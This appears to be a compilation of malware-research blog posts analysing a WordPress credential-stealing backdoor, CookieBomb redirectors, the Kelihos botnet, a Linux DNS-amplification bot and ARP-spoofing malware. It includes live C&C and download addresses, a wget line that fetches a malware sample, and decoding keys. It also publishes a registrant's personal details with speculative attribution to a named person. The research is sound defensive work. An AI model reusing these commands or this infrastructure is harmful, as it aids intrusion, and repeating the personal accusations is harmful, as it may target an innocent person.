Yes, it is not a new news to hear about the Wordpress or etc PHP-base CMS got hacked with malicious injected codes.
The hacked sites was injected with codes scattered inside of Wordpress PHP files, that obviously a hard-to-find quest, with the (mostly) targeting on (1)compromising the server & (2)implementing backdoors to be used to (3)the further step of maliciousness.
This post covered one of the popular scheme at the initial stage of a compromised site, which is using the CURL library and FORM/POST method to upload files contain credential grabbed via snagging a wp-config.php data for site's database filename, username (and password) as the hacker's first effort, following by (not covered here) the remote execution (mostly involving the tweak of web server security settings in .htaccess or etc WP components) script to be triggered by spam to by redirection from another hacked non-PHP (i.e. Javascript) evil code. Here we go:
The Code
I received a heads up from fellow crusaders (with thank you for the good report) in detecting one new method to obfuscate the evil backdoor code (in this case the POST destination site). Obligated to spread the info around I wrote this post. The evil code was detected in the file functions.php as per snipped below:
The above malicious code structure contains the credential grabbing method by accessing config in wp-config.php then followed by preparation for uploading a file, following by FORM method used to upload the data which contains the obfuscated destination URL, and forming the path of the blog with wrapping altogether to be POST'ed by the CURL library in PHP. The details breakdown of the code with the explanation is as per below:
The obfuscation used is the red-marked area can be decoded manually by using the ASCII table here-->>[LINK], or, in my case, I followed & tweak the original code to de-obfuscate the code as per following code: Which "$ty" will burp us the value of bad URL (the URL is jinxed for security purpose) below: ht tp : // thedojoreviews .com / post.php
OK, what we have here is a theft-case, a real credential and privacy stealing case which is needed to be followed down to the root of its individual bad actor (Read: Moronz) who implemented this threat.
Alive PoC
Currently the URL is up and alive as per shown in URLQuery (Thank's always guys!) without bad activities detected: URLQuery link is here-->>[LINK]
Network Investigation
For legal purpose, below is the information needed to file this as cyber-crime case:
The domain registration record of THEDOJOREVIEWS.COM
Domain Name: THEDOJOREVIEWS.COM Registrar: CRAZY DOMAINS FZ-LLC Whois Server: whois.syra.com.au Referral URL: http://www.crazydomains.com Name Server: NS21.CHEAPHOSTINGBD.COM Name Server: NS22.CHEAPHOSTINGBD.COM Status: ok Updated Date: 10-oct-2013 Creation Date: 06-feb-2013 Expiration Date: 06-feb-2014
The registrant data:
Registrant Details..: Registrant Name.....: Thomas Jacob First Name..........: Thomas Last Name...........: Jacob Address Line 1......: The Alm Address Line 2......: monte Lane City................: Aluva State...............: Kerala Country.............: IN Post Code...........: 683102 Phone...............: (+91) 9447024365 Fax.................: (+) Email Address.......: rocker7887i@gmail.com
The current IP used:
THEDOJOREVIEWS.COM. 14400 IN A 178.239.55.123
;; ANSWER SECTION: THEDOJOREVIEWS.COM. 21600 IN SOA ns21.cheaphostingbd.COM. zahid230.gmail.COM. 2013101004 86400 7200 3600000 86400 THEDOJOREVIEWS.COM. 21600 IN NS ns21.cheaphostingbd.COM. THEDOJOREVIEWS.COM. 21600 IN NS ns22.cheaphostingbd.COM. THEDOJOREVIEWS.COM. 14400 IN A 178.239.55.123 THEDOJOREVIEWS.COM. 14400 IN MX 0 THEDOJOREVIEWS.COM.
The exact same registration data used is spotted here-->>[LINK] Trailing the details: This is the URL of Facebook Profile fetched-->https://www.facebook.com/iVishnu007 This is his Facebook profile's picture.. could this be our bad actor? Well, it is way too easy indeed.. Just in case we dumped everything. Thank's to @essachin :-)
Furthermore the name popped up in "Security Researcher Acknowledgments for Microsoft Online Services - February 2013 Security Researchers" list, link -->>[HERE] The investigation is still OPEN, be free to advise us to report the correct bad actor's ID to the law enforcement by sending us message via Comment part below (the information will be filtered for investigation purpose).
The Moral of Story
We will see more of this threat, this is a work of automation, our advise will sound like a cliche but: please always Update & Patch your Web Server, PHP, your WordPress, into the latest version, and don't forget to do hardening your configs by eliminating un-necessary services or holes to avoid being used by "bad people". Once in a while it will be a good idea for you to start scanning your own site to know how to improve its security. Please stay safe!.
Now so long ago after during my recovery (had eyes surgery recently), I posted in our paste bin a disclosure of ESD.PHP malware redirector "The Server Side's Evil Code", the link is here -->>[MMD Pastebin], it was good post and receiving many questions about it. The main questions asked obviously about (1) how ACTUALLY this threat redirector works (in actual example), and (2) how to decode (read: crack) it in practical point of view, which I took a rain-check for this quite a while. And today while sorting all of my pending research task I found the issue, so this writing hopefully answering many curiosity and can be used as reference in decoding and mitigating the similar threat. So today we are going to play a lot with JavaScript and switch to the PHP codes.
I must warn you that I am not the natural coder of those two languages, so please bear on "my way" kind of decoding method.
Infection
It was started by a local site (as per below snapshot) that was detected to be infected by cookie bomb script infector: Some javascript was called from this site as per captured traffic below:
Code Analysis
I found two types of CookieBomb codes was injected in that site, the older one and "a bit" recent ones (noted: plural.. since multiple injection was detected), the obfuscation is using same kind of generator, as per snipped below: It looks like not so much differences spotted between those evil codes, isn't it? But, after deobfuscation the differences appears, for your convenience I compared the deobfuscated codes below:
It looks obviously CookieBomb codes, so let's see where does it go. The older one goes looks already in the site for quite long so it infected EK in the site that's not exist anymore, so I skipped it.
Spoofing a CookieBomb ;-)
OK. Let's pay attention to the newer code. Let's assemble the request for passing the correct condition and values this infector expect. Any tools or command line can be used for this purpose, I myself using any kind of method and gaining same result, but I prefer to use shell for this operation to be able to adjust here and there, the access is as per seen in the success attempt below: Obviously the HTTP/1.0 500 Internal Server Error was accrued, some autonatio may not getting anything after the error, but the rest of the data is all that I need, the data parts contains two blob of codes as per explained below: Now the partial form of the ESD.PHP codes was seen, let's go and crack this. It's not so difficult.
Decoding the threat
As we saw, the two blobs of codes is not JavaScript anymore, is PHP. And is a ESD script. So let's open the reference of previous ly disclosed the server side script here-->>[MMD Pastebin]. All you have to do is basically putting the pattern I pasted in the paste bin into this one. Step by step method is:
Take the Array blob put it into the modified PHP script below: And let's run it, you'll get the value similar below, which I separated into sections for the better understanding: You can also simulate it into any PHP environment to find the below output: Moving along.. we will need to fill these variables:
Using the "cracked key" part decoded above to know the threat actual destination (for redirection), and we need the FORM information decoded above too to know the operation performed by this threat.
Now is for extracting the key parts, using the decoded array values we know that the values are:
$key = 'gYwQF6jN'; $Salt = 'LtgkD'; $Gamma = '';
Now fill those variable with its values in the below script to generate the $c, which is the key of everything:
And all we have to do is just executing the script to get the output below: Let's put the values into the exact values in the cracked FORM above to fill the matrix and understanding what these are all about: Well, obviously the infection will redirect user to IP: 5.152.200.50 and requesting access to 5.152.200.50/wds/ohlo.php, with the failover to access http://localhost/. Be noted that we need the value of KEY:'1lwk8Ch7tUUKQyO' and ID:'28435' in researching further, the below code is explaining the POST command that will be executed by using all of the above matrix's values: Yes, we have the redirection by reversing without simulating the infection. The point of this post is helping the IR good friends to have a reference in investigation this infection, and also by understanding this decoding method, hopefully, many filtration logic can be applied to prevent the wide infection of latest CookieBomb with using ESD.PHP logic.
Thank's for @kafeine for the grabs for the server side codes and allowing me to pastebin-ed it, to MMD Germany team (can't mention more) for PHP codes discussion, and to all MMD folks, you all rocks. Additionally for your information CookieBomb is a serious threat, it was operated by an automation as per snipped in the below twitter snapshot, and is related to the way much bigger threat that drives many more infection with Exploitation Tools with or without BotNets, I hope this threat also will be prioritised more.
Be free to ask in comment, it is moderated for security purpose. Ah, BTW, please don't worry for this disclosure, even though the bad actors will change the threat'S logic after I released this disclosure, their level isn't that high, and we can easily crack them again, and again, and again. Have faith friends!
This is the report of the effort in our MalwareMustDie Tango Down OP with action initiated and finished by @essachin (well done!). This all started by the report in twitter from @ax0n as per snipped below:
#CrtyptoLocker's main C&C? This isn't sinkholed yet: ddbmdffeglno[.]
org currently resolves to 192[.]155[.]83[.]72 #MalwareMustDie
All domains listed above are also confirmed blocked by SURBL and SpamHaus that can be seen in the list here-->>[PASTEBIN], with also confirmed with overall infected CnC URL posted in Virus Total-->>[HERE], with supported by reference from good report of CIS Alert in: [1] and [2]
The domains were suspended with the below confirmation: We also announce the suspension in twitter below:
1: We initiated 2,989 Domains tangoed down by Internet Domain Registrar's Suspension Method. 2: Belonged to various EKs/Trojans which is having the same ID as Kelihos reseller domain as following: 3: We are only allowed to release Partial list of 311 of 2,989 domains as part of the list (below).
On the 5th December 2013 I am honoured to represent MalwareMustDie, NPO group to do a short talk about Kelihos fast flux botnet. The talk was shared between myself as MalwareMustDie OP Kelihos team leader and paired with Mr. Dhia Mahjoub of OpenDNS Umbrella Lab, and we are "supposed" to finish the talk in 20 minutes, meaning I must wrap up my part on 10 minutes.. Therefore I really thank the BotConf for the adjustment in time, and saving me from chocking my self :-))
MalwareMustDie team recently launched a classified & important operation against Kelihos botnet. The operation was called OP Kelihos (obviously..) started from August 2013 as per initiated in our blog posted-->>[HERE]; Following by the CnC takedown effort to PoC the link between CNC list and the Kelihos payloads with also explaining a "HowTo" to stop Kelihos botnet serving its payloads (we executed those takedown starting from 1st December in Netherlands and Germany); And in the end: The Disclosure of the recent facts of the botnet, which showing the botnet's weaknesses and the disclosure of the botherders ID in the BotConf, Dec 5th 2013 in Nantes, France.
During the BotConf, we split the presentation between myself and Dhia Mahjoub under the below outline, and I did the Kelihos talk for the Part 2,3,4 as per shown in the slide:
Kelihos is a very well-known botnet with the long history of surviving some taking down efforts. Technically known as the fast flux botnet, among the various functions (DNS, SpamBot, peer-to-peer) Kelihos is spreading malware affiliates binaries via its infected peers, which it's been covered by the multiple encryption to hide the core of service that they are actually really depending into, the botnet as service for malware affiliation.
This post is explaining about how MalwareMustDie team fights against Kelihos Botnet and aiming botnet's payload delivery scheme as the most weak point to attack. The writing is based on BotConf 2013 slides part 2, 3, and 4, the part that I presented in BotConf, but now with the compilation for the public purpose. I will not share the "too sensitive" information in this post, and all of the related data is the cyber crime evidence for the law enforcement to follow. There are so many functions in Kelihos botnet that I don't cover, like: its independent DNS scheme to support the fast flux functions, the spambot functions, the blacklist checking functions, and so on, but we will stick to the HTTP function that serves the payloads. My co-presenter, Dhia will post his part of presentation to explain the detail Kelihos fast flux monitoring in IP, domains and trend, in the separated post to be linked later on (this part will be edited later upon the link is ready).
The Encryption
We all read description and definition of Kelihos a lot so I will skip the boring part and go to the point of investigation started. Mr. Kyle Yang of Fortinet was the first one who published the Kelihos encrypted communication in Blackhat Europe in Amsterdam 2012, link-->>[HERE], and what he explained during the presentation about the encryption of communication between Kelihos job servers and CnC is the fact that actually shouldn't be ignored. And our project in fighting Kelihos was starting from it. You'd better see Mr. Yang's work in his blog-->>[HERE] to understand the details before continue reading the rest of details.
The most important fact that you will get after decrypting Kelihos CnC communication is, the botnet commands/method and the service to spread the malware payloads that's being served under its peers via the registered domains and file names. The picture below is the sample of the encrypted communications in Kelihos:
Well, as you can see, the domain name and the payload name exists in the communication. The captured data in the pic above was captured in the session of post-infected where the data between peer of infection (proxies) to job servers and CnC was hooked.
The question raised from my side, how is the logic for a new pre-infection of then? The question is answered by the existence of the "loaders" (read: downloader) binaries that has been delivered during infection to download the payload from the domains stated s per pic above. If you may want to take a look at what I analysed on the Texas Explosion Malvertisement in April, 2013 -->>[HERE] this is the sample of the download scheme for the pre-infection with the downloader which will call the domains and payloads as per below:
The Key of BotNet as Service: the Payloads
As per I explained in the BotConf. The pattern for the domains and payloads are having same logic as per below slides (see the first slide as the logic and next slides as PoC), fortunately this is the thing that Kelihos moornz can not change immediately for the spaces used for encryption is so limited:
Furthermore we figured the payloads distribution of this botnet and implement the "generic" samples (for PoC used for suspension domains) in the URLQuery as per regex below:
And also we implement same logic too in Kelihos BotNet monitoring IRC channels per country:
And also use the same logic for the evidence of damage report of Kelihos infection in specific countries:
A bit About Kelihos Payload
In every peer infection Kelihos botnet, there is root and loader directories that sharing the payloads. The root directory contains of original and malware affiliates binaries (related to the pay-per-install scheme), and the loader one contains of the downloader binaries to the affiliates malware. Dhia was making good statistic on the previous sample and I made conclusion about it. See the two slides below to see the explanation of differences between the payloads served in the root directories. It explained why there are payloads with the high detection rates and why there are payloads with the very low detection rates.
Systematic Investigation to Reveal the Botherder ID
Since the BotNet will need payloads to serve and by the technical scheme of Kelihos the payloads needs the ALIVE domains to distribute them, the ID cracking of Kelihos Botherder is not difficult in theory but is a really delicate work in our intel department.
On July 19th, 2013 I announced the activity of MalwareMustDie in cleaning up all .RU domains used by the Kelihos as per posted-->>[HERE]. Up to that time we saw a lot of Kelihos distributed by RedKit exploit kit as their main infector, together with the PHP redirection tool of ESD.PHP (see the write up about it-->>HERE). RedKit is quietly disappeared now, and ESD envolved into the CookieBomb, and Kelihos infector also shifted to this new infection tool. OK..back to the rail, after the .RU domains sacked down Kelihos moronz was shifting to the common TLD (read: internet domains) all over the world, abusing many ICANN credited registrars by using lame domain reseller to registered the Payload domain of Kelihos. This is where the point when we started the current operation.
First of all, since we started the investigation from zero ground of the new trend in payload's TLD (on early August 2013), we need to have as much reference as possible, at that point, when Kelihos started to use INTERNET.BS as the registrar for their payloads our reference was also zero. Yes, with the help of abuse.ch (with so many thank's for the GREAT effort of Roman), we sinkholed the domains, and then with the wonderful cooperation from CERT organizations, LE and registrars we also have ability to suspend the domains. The recorded domains used has the below picture characteristic, which we PoC explanation on the Kelihos payload domains in the blog post-->>[HERE]
The distribution of the domains itself is varied in some registrars all over the world with the list on the presentation slide I presented in BotConf below (the total data so far is 913 domains from August until 3rd December 2013, but the pic below is the data until mid October 2013):
The team was having good coordination, to seek and to destroy new domains. It was pretty hard to do on the beginning, under mock and grins from some researchers.. our group is keeping on detecting, checking and taking down the domains to force the trails of evidence for the data cross-check comparison until we have overall positive ID for the third party domain resellers (noted the "s", is plural and more than two) used by this crime action.
Cross-checking the email ID above to the (1) domain-snopping sites, (2) promotion of the Kelihos BotNetin some black forum, and the way the botherder do the AV scanning new payloads domains before release the new domains/payloads in the CnC communication and push it to the peers, we connected the dots and all lead to the one important communication centre owned by the botherders. Below is some limited snapshots during the disclosure in BotConf:
The "black forum that promoting Kelihos" SQL Dump for confirming the domain reseller email address to Kelihos:
The data of domain shopping SQL records that reveals the botherders email ID:
Information leads to a "well-known AV and URL scanner checks for the bad domains" that being used by the Kelihos botherders to check the new Domain (URL) and its payloads itself:
Which the above data is lead to the main communication ID :-)
The PoC to link the ID to the Payload of Kelihos
With the legal entity collaboration with our partner (GroupIB) to build evidence data to be reported to law enforcement we conducted heavy surveillance to the bad actor communication ID to find :-) "every evidence" we need.
In BotConf we displayed the spam templates orders (w00t), the orders/invoice/payment for the Hosting of CNC (w00t), and other communication they use like twitter account (w00t), with also some extra ++ information. But for special information we pass only to LE like: Webmoney they used, hoster contracts and etc data. Below is a list of the CnC & Mothership servers of Kelihos served in Netherlands and Germany they used before BotConf 2013:
OP Netherlands & OP Morgenerwachen for PoC
We launched two operations on December 1st 2013 for proving to the eyes of law that the list of CNC we extracted from suspected botherder's communication is the Kelihos payload list. We basically work under good coordination between OP team, MMD members, and law enforcement channel in both countries (Nether lands and Germany) to takedown the listed CNC and safe the data for the evidence purpose accordingly. The PoC to be approved is: "If after takedown the CnC and the payload stopped, the botherder suspect is beyond any doubt to be responsible to all Kelihos payload activities"
Below is twitter time-line is the evidence of the activities during the Operations:
The PoC Positive Result, with Snapshot Images & Videos
The operation was successfully executed. And as the result of the operation, after the CnC was completely down, the Kelihos botnet is not having ANY payloads to serve, or to be precise, having errors in serving payloads, evidence is as per tweeted below:
The video below was taken during we shutdown half of CnC (in Netherlands), the peers IP address of the Kelihos proxy looks still giving response to provide infection of the payload, but the payload itself is not accessible with the HTTP error 502. (Please compare to the first Video which showing the normal payload download)
The below video was taken after full CNC was shutdown, that time the botnet can not even reach the peer anymore (see the READ ERROR & NO DATA RECEIVED message shown in every wget request in my script to download the payload):
Yes, for some time between 3-4 days (During the beginning of BotConf) the Kelihos was running without serving any payloads at all :-) The PoC between the CnC list extracted from the "suspected-yet-proven-guilty" botherder's communication, link to the payload system of the Kelihos is perfectly proven as per expected. The ID's owner, beyond any doubt, is the BotHerder's ID of Kelihos botnet in this case, really deserves to sleep in Jail soon.
In the BotConf short talk we went to slides to explain this PoC since my 10minutes time is not enough to explain all of the fact, below is the slides explaining this PoC point:
The CrimeBoss, Kelihos BotHerder ID
All of the above written data are coming from one single communication owned by a individual which his ID I exposed in the BotConf, 2013. This Russian nationality of 37 years old male is responsible to all activity in Kelihos. So if you have the picture of it, please pass it to your country's law enforcement to be process further:-) . For your information I will not expose the information in here, the information was actually passed to the related country's law enforcement from September, 2013.
Additionally, he is also responsible the Pump-and-Dump spam which we recorded his communication in ordering the template from the translators as per shown in the below slides:
And also for your information, @kafeine wrote an excellent report about iframe "CookieBomb" injection tool in-->>[HERE], and in the contact section was written the email address with the domain that pointed to the IP address in the CnC server list describe above:
There are also many more information which is very sensitive and confirming more malicious activities and connection of this moronz behind Kelihos, is a subject to be passed to all LE channels.
Conclusion
1. What is the best way to stop the Kelihos botnet? We can not make it stop by the taking down the infection peers. This threat can be stopped only by the arrest of the bad actors, or make a way to stop the Kelihos botnet serving malware payloads for the disruption level. :-) Taking down domains and peers won't help much unless you need to do the investigation reference data like we did to find the pattern to start dotting the lines.
2. With the good coordination between security researchers as one team-work, we can detect, monitor, investigate, build evidence, pull some PoC to proof the crime scheme, and pass the information to the LE in a good wrap. This level of information is what actually needed to make sure the arrest will be executed on the rails. We will and still always need your help, to push and to be sure that the ID that proven guilty and disclosed in BotConf to go to jail accordingly.
3. The video and presentation will be shared after the editing is finished.
Thank you
As MalwareMustDie, NPO, we thank The BotConf team, who was so kindly offer us place and great hospitality to do the "stage", I personally like very much the idea of Botnet Conference, and will do the very best to support the event for the future also, I guess we have to prepare to crack another botnet's moronz ID to be presented in the BotConf 2014. Count us in, we will be there. Thank you again Eric, Seb and the team! God bless your good effort!
I thank to all OP Kelihos friends involved to this operation that helped us out to make this operation into the success from day one. Without your trust and being with us since beginning this coordination will never happen, for some security purpose discussed with my lawyer it will be the best way not to reveal your ID in this post. At least, as researcher we did what we could do, and I'd say we do not bad about this case. Respect to you all. :-)) Glad to work together with a solid team work.
I would thank GroupIB who is trying hard to push the case to the law enforcement, I really wish you guys to see the PoC that we want to confirm here, the CnC list and the Kelihos payload is connected in the most understanding way, so there will be no doubt left to aim the suspect into jail to pay his sins. I thank Mr. Christiaan Beek from McAfee, who did the great great work in taking down CNC. To fellow crusaders (Markus Fritz, Hans W. Opot) in Germany, with the help of LKA/BKA to perform the help to support this PoC in taking down the CnC. Respect to you all also.
Thank you also to the US team of MMD who's helping monitoring the case and the shutdown, specially to Mr. Andre Dimino, Mr. Dave Marcus, @rjacksix, @Cephurs and @Malmouse ; for your advice, confirmation and patience in dealing with stubborn researchers in MMD.
I specially personally thank so much to one person : @kafeine who help me a lot and stay behind the scene of this operation. And also great thank to the great intel conducted by our intel team (I can not reveal their ID yet, but he is always with me in BotConf..if you know what I mean..) .. and all of the supporter of MalwareMustDie (including Paul with his new Templar robe), YOU ARE THE BEST!!
Kudos BotConf 5-6 Dec, 2013, Nantes, France - Nice Memory!
Consider this as "another" MalwareMustDie's New Year Security Awareness. We detected an increasing in attack in hacking for implementing DNS-Amp specially in implementation on ELF part of tools, not necessarily with the automation hacktool, but with video below as evidence showing the manual hack effort. We bumped to this threat in early November, 2013, when our friend @lvdeijk found the set of binaries below in his honeypot: This turned out as a set of the DNS Amp attack binaries for PE and ELF (see the "ms20" one in the above set). We investigated the ELF and posted in our paste bin here-->>[MMD PASTEBIN].
Reversing shows that the ELF binary has codes for DNS Amplification, sensitive information stealing effort & encryption for the data, but in behavior testing was not showing any amplification instead beaconing mothership which suggesting that the linux binary is not working as per expected by the amateur-wannabe-linux-developer moronz. So we left the case for monitoring status.
After that time there were other good security people investigating the case as per below URL references explaining the threat very good, please take a look of the below good posts before continuing reading this post:
However today we face the fact that not only @lvdeijk which is still get hit by the same attacker, but one of our OTHER friend's (Thx to: @wirehack7) honeypot also got hit by the same threat, so we made precautions as PoC of attack, and this time everything was well recorded down to their shell commands used during attack in progress, as per recorded in below video:
So this is the BAD NEWS is..The threat is active as per Dec 27, 2013 when I write this post! And this threat lives happily ever after in infecting and hacking some UNIX environment in many networks in internet. As most of us in MMD are unixmen we couldn't stand watching this so hopefully this post will raise MORE awareness of the threat, as we also started the OP for this. I was wondering IF the ELF download source is up today so just made a quick check and found positive confirmation, I just grabbed iPad to make this video as evidence:
To make it merrier..as per all people know that the VT show low detection too for these ELF (read: Linux executable binaries) scanning, as per shown in the AV result. It never reach more than 5 points so far, I am starting to wonder why there are so many Linux scanner AV product that can not detect this? A fact that users must swallow when they expect to detect this in their server by using some products.
OK. I don't want to argue about any of sigs matter that AV industry provides, but I must say that ELF is a serious threat that needs to be more prioritize, specially in the hack session like this. Please think about big amount of users are actually buying license per year to make their server protected for threat like this, they deserve BETTER service, so please make more effort to publish your sigs.
Moving on. Just to be sure, I made a quick re-analysing the new / recent ELF with the details below with my poor home-brew tool called fileelf, is actually bash script helping me for quick analyzing ELF binaries fast, and resulted that all functions are so equal and modification was detected only in the IP addresses destination (of the CnC). The logic is all the same, once it started the daemon it grabs all the info from environment, and then the series of "communication" begin, noted that the config created was having its initial values in the first writing, and nothing more than that, so (maybe) one should let this evil tool runs longer to monitor and record all of the CnC communication to make a better record of what this tool is actually can do.
(! ELF Analysis )
$ fileelf ./disknyp ./disknyp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
So we see what the binary is all about. Below are some dis-assembly traces, which is confirming previous analysis made by many good people, so I won't make more unnecessary comments just paste my codes below:
*) NOTED: with dumping a very long disasm codes.. all show the match previous analysis by us and by others.
Moving along, I used my previous test bed, I am a BSD guy, so if I have to use linux is going to be slackware (read: Linux) with adding to its environment with some lib & patches to make some evil binary run as in heaven, so I ran it to PoC some functions, and the below is officially some notes that I took, this shows great deal of source of CNC:
(!BEHAV) // Without permission....fail1 ** SELINUX **
7297 ? S 0:00 /bin/sh 7391 ? Ssl 0:00 ./disknyp <== See its PID (point of this ps buff) 7434 pts/0 R+ 0:00 ps ax
(!NETSTAT)
$ netstat -napt (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name ---------------------------------------------------------------------------------------------------------- tcp 0 0 127.0.0.1:xxx 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:xxx 0.0.0.0:* LISTEN - tcp 0 27 diemoronz.mmd.org:39445 190.115.20.27:59870 ESTABLISHED 7391/disknyp
(!CONFIGS) // This is where they put default port range and bind IP for the overall process:
$ cat fake.cfg 0 127.0.0.1:127.0.0.1 10000:60000
So, as per shown above. The CNC is "ddos-guard.net" at 190.115.20.27:59870.. sounds spooky isn't it? for the domain name of DNS Amp's CnC.. Things are starting to smell stink indeed..go figure.
DNS-Amp CNC Traffic
Below is the CnC (corrected after internal discussion w/ @sempersecurus) traffic recorded, noted the PUSH-ACK with the certain length in the sent packet. The globes of packet of 0x00 looks poking the mothership. For the LE, is an important note here: If there is a transmitter there should be a receiver to dig at the 190.115.20.27, and you can get the full set of crime evidence.
Conclusion and Mitigation
Again. The point of this post is: Download source is ALIVE Currently:
$ wget h00p://198.2.192.204:22/disknyp -O ./samplexxx --2013-12-29 00:54:56-- h00p://198.2.192.204:22/disknyp Connecting to 198.2.192.204:22... connected. HTTP request sent, awaiting response... 200 OK Length: 1491887 (1.4M) [application/octet-stream] Saving to: './samplexxx' 100%[================>)] 1,491,887 174KB/s in 7.7s 2013-12-29 00:55:04 (190 KB/s) - './samplexxx' saved [1491887/1491887]
And the CnC is running too:
PROT LOCAL REMOTE STATUS PID / BINARY NAME --------------------------------------------------------------------------------- tcp diemoronz.mmd.org:39445 190.115.20.27:59870 ESTABLISHED 7391/disknyp
To be blocked/mitigated, PLEASE COLLECT THESE THREE SETS OF INFORMATION IN EVERY I.R FOR THIS CASE:
198.2.192.204:22 (Download SourceIP = Hacked Site) 190.115.20.27:59870 (CnC, Could be Proxied) 218.28.116.227 (Hack source IP)
At least this is the third time we see it downloading the ELF ones via x.x.x.x:TCP/22, and connecting to the CNC into this IP:PORT -->x.x.x.x:TCP/59870. So I really hope the regex blocking for downloading these binaries & CnC connection can be produced by IDS products sigs (i.e.: Emerging Threat, Squid ACL filter, Snort/VRT or Nessus) ASAP.
As per written above we raised OP for this threat, and now is p to the LE to move, below is the ID of the coder. Is positive, you ca find him in the below snipped moronz forum or in DK and he is bragging of this "amplification" tool. As per this intelligence information added to this post, our moronz is so busy deleting his trails and thread posted in many forums ;-)) so below is some of many snapshot we took. Since this prick is starting deleting his thread activities.. ps: Don't make us paste the DK posts here..
We really hope LE will mark the guy and this crime into his sin-list, and believe me this attack is a positive hack effort, so is not that difficult to link all of the data gathered in this post to the moronz which ID we spotted above.
So, is the hacker coming back after that?
The answer is YES and below is his action in "implementing" more shits in our team's trap-box. Some moronz just won't learn to stop. Is a moronz sickness..
Stay safe during the new year, check your logs for similar ssh hack pattern.
One more 2014 New Year Malware Awareness Message from MalwareMustDie:
Self spreading malware project to infect other nodes using ARP spoofing based scanner was spotted back in several month, our intelligence reported and we keep on monitoring its progress ever since, and the moronz involved just has been released in the cyber criminal's forum. The malware works practically by controlling the usage of ARP broadcast to be as stealth (not noisy) as possible to spoof the ARP packets and grabbing nodes information for determine the target for the infection. The method is simple, yet worked (as per quick tested).
Currently the code was "secured in to our hand" and of course we informed several industry and trusted researchers for this new threat, but after compiling and test AV scanning found the detection ration is still very low, wondering why.. Assuming the threat is NOT handled as "priority" by industry's side we think is better to raise awareness of this threat's existence is needed, that's why we disclose the codes in here, to aim overall malware researcher community's attention.
We also think is important to eliminate the threat from their ground zero when they're first spotted, not necessarily wait until becoming popular or epidemic., so if there is a clear shot to be taken, hammering any effort in improvement of any form malicious method is the only MMD main mission from beginning. Explaining the additional reason of this disclosure.
For the authenticity of the above statement, below is the message snagged from a known moronz forum, about this evil-product's release post, you go figure which forum it is. To be frank, if you are a security industry entity and you are not noticing this, is time to for you to put more effort budget on intelligence work instead: This moronz is actually releasing the product and seek for buyers (promotion). The package we snagged is a full code of project of this malware,and currently the commercial version was spotted too including the pcap installer inside.
And this is the text of the malware release notes, you'll see here how the project was built:
AppWizard has created this LANSpy application for you.
This file contains a summary of what you will find in each of the files that make up your LANSpy application.
LANSpy.vcxproj This is the main project file for VC++ projects generated using an Application Wizard. It contains information about the version of Visual C++ that generated the file, and information about the platforms, configurations, and project features selected with the Application Wizard.
LANSpy.vcxproj.filters This is the filters file for VC++ projects generated using an Application Wizard. It contains information about the association between the files in your project and the filters. This association is used in the IDE to show grouping of files with similar extensions under a specific node (for e.g. ".cpp" files are associated with the "Source Files" filter).
LANSpy.cpp This is the main application source file.
///////////////////////////////////////////////////////////////////////////// AppWizard has created the following resources:
LANSpy.rc This is a listing of all of the Microsoft Windows resources that the program uses. It includes the icons, bitmaps, and cursors that are stored in the RES subdirectory. This file can be directly edited in Microsoft Visual C++.
Resource.h This is the standard header file, which defines new resource IDs. Microsoft Visual C++ reads and updates this file.
LANSpy.ico This is an icon file, which is used as the application's icon (32x32). This icon is included by the main resource file LANSpy.rc.
small.ico This is an icon file, which contains a smaller version (16x16) of the application's icon. This icon is included by the main resource file LANSpy.rc.
///////////////////////////////////////////////////////////////////////////// Other standard files:
StdAfx.h, StdAfx.cpp These files are used to build a precompiled header (PCH) file named LANSpy.pch and a precompiled types file named StdAfx.obj.
///////////////////////////////////////////////////////////////////////////// Other notes:
AppWizard uses "TODO:" comments to indicate parts of the source code you should add to or customize.
The payload of the threat is infection of ANY executable file (not specifically a PE file, noted this well) in windows platform. As per seen in the below source code snips taken from the project's code:
Below is the video of this disclosure, the video contains code snapshots, libraries & overall files, archive names + hash, and how to contact us for getting the source. See this video well before you requesting anything to us, the video was made by our team, contains enough information to satisfy your curiosity to confirm about the maliciousness of the software. But I do not include any compilation, any build process related to this source, we don't compile and avoid any effort in production of these except for detection rates testing purpose one time, we deleted the materials. Now we leave it for you to analyze, test and research. Moreover, this is the evidence of the cyber crime, so we don't feel to share this to everyone. By seeing the code, one is expected to learn the concept that is being used to code ARP spoofing malware infection. And researching the best way/method in mitigating the threat if the infection starts. For real, it will be a hard effort to stop it instantly once a security perimeter is breached by this malware installation, and any computer device just don't block ARP broadcast by default. So we urge to you to test it and see how it works too, not only taking sigs and leave it as per it is. I expect seeing report on fellow researcher's blog about the report of this mess. Our team is making a very hard effort for informing this, do not mock this disclosure but take it positively, and take a look at the materials, and it is time to read the codes.
Let us warn you again: this is NOT malware sample but a malware SOURCE CODE, not a stuff that can be openly shared, we share to law enforcement, AV industry & security scanner products & vetted trusted researchers as the first priority, for sharing purpose. So if you related to those entities, prepare FTP account for us to PUSH the data into yours, and we're sorry that we need a legit emails/comm for this, it is not dealing with individuals but with your entities, please do not hesitate to contact.
For the malware moronz, if you think we don't watch you closely THINK AGAIN! Stop your evil coding practice before is too late, if beloved God blessed your stupid head to make code and please use your skill to code good system or application to make an honest living instead. Even if life is unfair to you that's NEVER be a tolerable excuse to keep on making new shits. So you are warned, payday will come soon, we're assuring you we're different to any form that ever deals with you, we're straight coming to you.
This post is dedicated to MMD Georgia, a country of crusaders.
Our team found this threat and we decided to openly raise awareness about it. Is a Keylogger with bragging of being Fully Undetected (FUD), the sad part is, it is.. which causing the background of this disclosure. It crashed my IDA Pro during opening the bins, gotta break 2 of my RATs to run & analyze it, yes it is infected and a bad stuff that should be eliminated on the first attempt.
As per previously post also mentioned, we (read: MalwareMustDie,NPO - Anti CyberCrime & Malware Research Group) work not only in defensive way but being active to spot the threat as early stage as possible, and inviting thus support law enforcement & CERT folks to initiate the crime case upon it.
Source of the threat
During the analysis process of a new malware sample of "logger.exe" binary we received from a therat report, we figured further that the sample is the Shadow Logger, the malware keylogger binary. Checking deeper in some forums we found more details and the " sales product campaign banner" of this malware: The longer information of the campaign info itself, which included the malicious purpose in details:
The Bad Actor's ID:
